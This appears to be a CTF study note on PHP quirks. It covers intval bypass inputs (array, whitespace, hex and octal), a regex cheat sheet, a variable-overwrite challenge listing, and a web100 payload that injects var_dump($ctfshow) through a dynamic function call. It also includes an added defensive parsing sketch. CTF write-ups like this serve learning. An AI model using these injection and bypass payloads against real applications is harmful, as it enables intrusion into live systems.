PHP quirks

01

The intval function
Bypass by passing an array

02

Use a base conversion, or add a space in front.
Payload:

?num= 4476
?num=0x117c
?num=010574
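
The PHP sketch below is an added example, not code from the original post or from the challenge. It contrasts the kind of check these payloads get past (assumed here to be a raw-string comparison followed by intval($num, 0)) with a strict parse; the function names and sample inputs are constructed.

```php
<?php
// Added example: the denylisted value and sample inputs are constructed.
const BLOCKED = 4476; // assumed value, taken from the payloads on this page

// Weak pattern (assumed): compare the raw string, then parse with base 0.
// Base 0 makes intval() accept leading whitespace, 0x hex and 0-prefixed octal.
function weak_is_blocked($num): bool
{
    return $num === (string) BLOCKED;
}

// Hardened: accept only a canonical decimal string, convert once,
// and run every later comparison on the resulting integer.
function parse_decimal($num): ?int
{
    if (!is_string($num)) {
        return null; // arrays and other types are rejected outright
    }
    // \A and \z anchor to the whole string; $ would allow a trailing newline.
    // At most 9 digits, so the value cannot overflow an int.
    if (!preg_match('/\A(?:0|[1-9][0-9]{0,8})\z/', $num)) {
        return null;
    }
    return (int) $num;
}

$samples = ['4476', ' 4476', '0x117c', '010574', "4476\n", '123', ['4476']];
foreach ($samples as $raw) {
    $label = json_encode($raw);
    if (is_string($raw)) {
        $weak = weak_is_blocked($raw)
            ? 'blocked'
            : 'passes, intval(.,0)=' . intval($raw, 0);
    } else {
        $weak = 'n/a';
    }
    $n = parse_decimal($raw);
    $strict = $n === null
        ? 'rejected'
        : ($n === BLOCKED ? 'blocked' : "accepted as $n");
    printf("%-12s weak: %-28s strict: %s\n", $label, $weak, $strict);
}
```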

03

The preg_match() function

Symbol Meaning
[abc] A single character: a, b or c
[^abc] Any single character but a, b, or c
[a-z] Any single character in the range a-z
[a-zA-Z] Any single character in the range a-z or A-Z
^ Start of line
$ End of line
\A Start of string
\z End of string
\s Any whitespace character
\S Any non-whitespace character
\d Any digit
\D Any non-digit
\w Any word character (letter, number, underscore)
\W Any non-word character
\b Any word boundary character
(a|b) a or b
a? Zero or one of a
a* Zero or more of a
a+ One or more of a
a{3} Exactly 3 of a
a{3,} 3 or more of a
a{3,6} Between 3 and 6 of a
. Any single character
(…) Capture everything enclosed

04

On Linux, the current directory is written as ./

05

<?php
include("flag.php");
# If any GET parameter is passed, overwrite $_GET with the POST values
$_GET?$_GET=&$_POST:'flag';
# If the flag parameter equals 'flag', $_GET is overwritten with $_COOKIE. Here it is enough to make the flag parameter not equal to 'flag'
$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';
$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';
# If an HTTP_FLAG parameter exists and equals 'flag', the final flag is output
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);
?>

06

web100

$v2('ctfshow')$v3, where v2 must be the command and v3 is passed a semicolon.
v0 is the AND of three values; with v2 and v3 not numeric and v1 numeric, the result is 1.
Payload:

?v1=1&v2=var_dump($ctfshow)&v3=;

Alternatively, comment v3 out directly with an inline comment:

?v1=1&v2=var_dump($ctfshow)/*&v3=*/;

07
